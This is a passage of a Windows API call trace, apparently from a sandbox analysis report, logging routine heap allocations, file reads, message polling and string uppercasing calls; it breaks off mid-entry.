PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.414] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.414] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.414] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.415] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x7f8f, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0258.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f8f) returned 0x3571018 [0258.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0258.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f8f) returned 0x24b7a48 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f8f) returned 0x3571018 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0258.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.419] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f8f) returned 0x3571018 [0258.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f8f) returned 0x24bf9e0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.422] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.427] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.428] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 